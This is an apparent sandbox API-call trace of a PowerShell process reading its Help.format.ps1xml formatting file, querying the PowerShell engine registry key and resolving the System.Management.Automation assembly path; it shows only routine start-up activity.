	[0226.265] SetErrorMode (uMode=0x1) returned 0x1
	[0226.265] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0226.265] GetLastError () returned 0x0
	[0226.265] GetFileType (hFile=0x358) returned 0x1
	[0226.265] SetErrorMode (uMode=0x1) returned 0x1
	[0226.265] GetFileType (hFile=0x358) returned 0x1
	[0226.265] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.266] GetLastError () returned 0x0
	[0226.266] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.267] GetLastError () returned 0x0
	[0226.267] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.267] GetLastError () returned 0x0
	[0226.267] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.267] GetLastError () returned 0x0
	[0226.267] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.267] GetLastError () returned 0x0
	[0226.267] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.267] GetLastError () returned 0x0
	[0226.267] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.267] GetLastError () returned 0x0
	[0226.267] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.268] GetLastError () returned 0x0
	[0226.269] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.269] GetLastError () returned 0x0
	[0226.269] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.269] GetLastError () returned 0x0
	[0226.270] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.270] GetLastError () returned 0x0
	[0226.270] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.270] GetLastError () returned 0x0
	[0226.270] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.270] GetLastError () returned 0x0
	[0226.270] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.271] GetLastError () returned 0x0
	[0226.271] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.271] GetLastError () returned 0x0
	[0226.271] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.271] GetLastError () returned 0x0
	[0226.274] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.274] GetLastError () returned 0x0
	[0226.274] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.274] GetLastError () returned 0x0
	[0226.275] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.275] GetLastError () returned 0x0
	[0226.275] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.275] GetLastError () returned 0x0
	[0226.275] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.275] GetLastError () returned 0x0
	[0226.276] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.276] GetLastError () returned 0x0
	[0226.276] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.276] GetLastError () returned 0x0
	[0226.276] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.276] GetLastError () returned 0x0
	[0226.276] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.276] GetLastError () returned 0x0
	[0226.277] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.277] GetLastError () returned 0x0
	[0226.277] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.277] GetLastError () returned 0x0
	[0226.277] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.277] GetLastError () returned 0x0
	[0226.278] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.278] GetLastError () returned 0x0
	[0226.278] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.278] GetLastError () returned 0x0
	[0226.278] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.278] GetLastError () returned 0x0
	[0226.278] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.278] GetLastError () returned 0x0
	[0226.284] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.284] GetLastError () returned 0x0
	[0226.284] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.285] GetLastError () returned 0x0
	[0226.285] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.285] GetLastError () returned 0x0
	[0226.285] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.285] GetLastError () returned 0x0
	[0226.285] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.285] GetLastError () returned 0x0
	[0226.286] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.286] GetLastError () returned 0x0
	[0226.286] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.286] GetLastError () returned 0x0
	[0226.286] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.286] GetLastError () returned 0x0
	[0226.286] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.286] GetLastError () returned 0x0
	[0226.287] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.287] GetLastError () returned 0x0
	[0226.287] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.287] GetLastError () returned 0x0
	[0226.287] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.287] GetLastError () returned 0x0
	[0226.287] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.288] GetLastError () returned 0x0
	[0226.288] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.288] GetLastError () returned 0x0
	[0226.288] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.288] GetLastError () returned 0x0
	[0226.288] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.288] GetLastError () returned 0x0
	[0226.289] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.289] GetLastError () returned 0x0
	[0226.289] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.289] GetLastError () returned 0x0
	[0226.289] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.289] GetLastError () returned 0x0
	[0226.289] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.290] GetLastError () returned 0x0
	[0226.290] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.290] GetLastError () returned 0x0
	[0226.290] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.290] GetLastError () returned 0x0
	[0226.290] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.290] GetLastError () returned 0x0
	[0226.291] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.291] GetLastError () returned 0x0
	[0226.291] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.291] GetLastError () returned 0x0
	[0226.291] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.291] GetLastError () returned 0x0
	[0226.291] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.291] GetLastError () returned 0x0
	[0226.292] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.292] GetLastError () returned 0x0
	[0226.292] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.292] GetLastError () returned 0x0
	[0226.292] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.292] GetLastError () returned 0x0
	[0226.292] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0xf37, lpOverlapped=0x0) returned 1
	[0226.293] GetLastError () returned 0x0
	[0226.293] ReadFile (in: hFile=0x358, lpBuffer=0x2f38e43, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f38e43*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0226.293] GetLastError () returned 0x0
	[0226.293] ReadFile (in: hFile=0x358, lpBuffer=0x2f3976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f3976c*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0226.293] GetLastError () returned 0x0
	[0226.293] CloseHandle (hObject=0x358) returned 1
	[0226.293] GetLastError () returned 0x0
	[0226.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0226.293] GetLastError () returned 0x0
	[0226.293] SetErrorMode (uMode=0x1) returned 0x1
	[0226.294] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f5a768 | out: lpFileInformation=0x2f5a768*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0226.294] GetLastError () returned 0x0
	[0226.294] SetErrorMode (uMode=0x1) returned 0x1
	[0226.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0226.294] GetLastError () returned 0x0
	[0226.294] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3a8 | out: phkResult=0x29e3a8*=0x358) returned 0x0
	[0226.294] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x0, lpcbData=0x29e3ec*=0x0 | out: lpType=0x29e3f0*=0x1, lpData=0x0, lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.295] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x7a4288, lpcbData=0x29e3ec*=0x56 | out: lpType=0x29e3f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e3ec*=0x56) returned 0x0
	[0226.295] RegCloseKey (hKey=0x358) returned 0x0
	[0226.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0226.295] GetLastError () returned 0x0
	[0226.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29dee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0226.295] GetLastError () returned 0x0
	[0226.309] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xea8665f7, Data2=0x2cee, Data3=0x41f4, Data4=([0]=0xbc, [1]=0x42, [2]=0x8a, [3]=0x54, [4]=0x9e, [5]=0x8f, [6]=0x83, [7]=0x26))) returned 0x0
	[0226.310] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xe152527f, Data2=0x768c, Data3=0x4dd3, Data4=([0]=0x84, [1]=0x9b, [2]=0xfd, [3]=0x3a, [4]=0xb6, [5]=0xbd, [6]=0x12, [7]=0x3))) returned 0x0
	[0226.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.374] GetLastError () returned 0x0
	[0226.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.374] GetLastError () returned 0x0
	[0226.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.374] GetLastError () returned 0x0
	[0226.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.374] GetLastError () returned 0x0
	[0226.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.417] GetLastError () returned 0x0
	[0226.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.418] GetLastError () returned 0x0
